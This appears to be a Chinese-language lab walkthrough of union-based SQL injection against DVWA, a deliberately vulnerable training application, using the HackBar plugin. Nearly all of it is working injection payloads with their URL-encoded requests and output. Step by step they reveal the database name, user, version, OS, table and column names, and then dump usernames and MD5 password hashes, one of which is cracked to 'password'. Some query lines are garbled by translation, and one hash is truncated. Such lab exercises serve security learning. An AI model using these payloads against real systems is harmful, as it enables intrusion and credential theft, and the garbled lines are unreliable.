摘要:security=high;PHPSESSID=i3e64cdvqbeq2ekvpccaeumo11

security=high;PHPSESSID=i3e64cdvqbeq2ekvpccaeumo11

HackBar 网页调试插件

http://10.1.4.30/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#

1' union select database(),user()#

------------

http://10.1.4.30/vulnerabilities/sqli/?id=1%27+union+select+database%28%29%2Cuser

%28%29%23&Submit=%E6%8F%90%E4%BA%A4#

------------

ID:1'union select database(),user()#

名字:admin

姓氏:admin

ID:

1'union select database(),user()#

名字:dvwa

姓氏:root @ localhost

-------------------------------------------------------------------------------------

-1' union select database(),user()#

------------

http://10.1.4.30/vulnerabilities/sqli/?id=-1%27+union+select+database%28%29%2Cuser

%28%29%23&Submit=%E6%8F%90%E4%BA%A4#

------------

ID:

-1'union select database(),user()#名字:dvwa

姓氏:root @ localhost

---------------------------------------------------------------------------------------

-1' union select version(),@@version_compile_os#

------------

http://10.1.4.30/vulnerabilities/sqli/?id=-1%27+union+select+version%28%29%2C

%40%40version_compile_os%23&Submit=%E6%8F%90%E4%BA%A4#

------------

version() 获取当前数据库版本,@@version_compile_os获取当前操作系统

ID:-1'union select version(),@@ version_compile_os#

名字:5.5.48-log

姓氏:Linux

---------------------------------------------------------------------------------------

-1' union select table_name,2 from information_schema.tables where table_schema= 'dvwa'#

ID:-1'union select table_name,2 from information_schema.tables where table_schema

='dvwa'#

名:guestbook

姓氏:2

ID:-1'union select table_name,2 from information_schema.tables where table_schema

='dvwa'#

名字:users

姓氏:2

爆出来两个表

------------------------------------------------------------------------------------------

-1' union select column_name,2 from information_schema.columns where table_schema= 'dvwa' and table_name= 'users'#

ID:-1'union select column_name,2 from information_schema.columns where table_schema

='dvwa' and table_name ='users'#

名字:user_id

姓氏:2

ID:-1'union select column_name,2 from information_schema.columns where table_schema

='dvwa'and table_name ='users'#

名:first_name

姓氏:2

ID:-1'union select column_name,2 from information_schema.columns where table_schema

='dvwa'and table_name ='users'#

名字:last_name

姓氏:2

ID:-1'union select column_name,2 from information_schema.columns where table_schema

='dvwa'and table_name ='users'#

名:user

Surname:2

ID:-1'union select column_name,2 from information_schema.columns where table_schema

='dvwa'and table_name ='users'#

名字:password

姓氏:2

ID:-1'union select column_name,2 from information_schema.columns where table_schema

='dvwa'and table_name ='users'#

名:avatar

姓:2

----------------------------------------------------------------------------

-1' union select user,password from users#

爆破user,password表数据

ID :-1'union select user,用户密码#

名:admin

姓氏:5f4dcc3b5aa765d61d8327deb882cf99

ID:

-1'union select user,

用户密码#名:gordonb

姓:e99a18c428cb38d5f260853678922e03

ID :-1'union select user,用户密码#

名:1337

姓:8d3533d75ae2c3966d7e0d4fcc69216b

ID :-1'union select user,用户密码#

名:pablo

姓:0d107d09f5bbe40cade3de5c71e9e9b7

ID :-1'union select user,用户密码#

:smithy姓:5f4dcc3b5aa765d61d8327deb882cf9

admin密码通过MD5解密得到字符串是“5f4dcc3b5aa765d61d8327deb882cf99”,解密的结果

为“password”!

-----------------------------------------------------------------------------------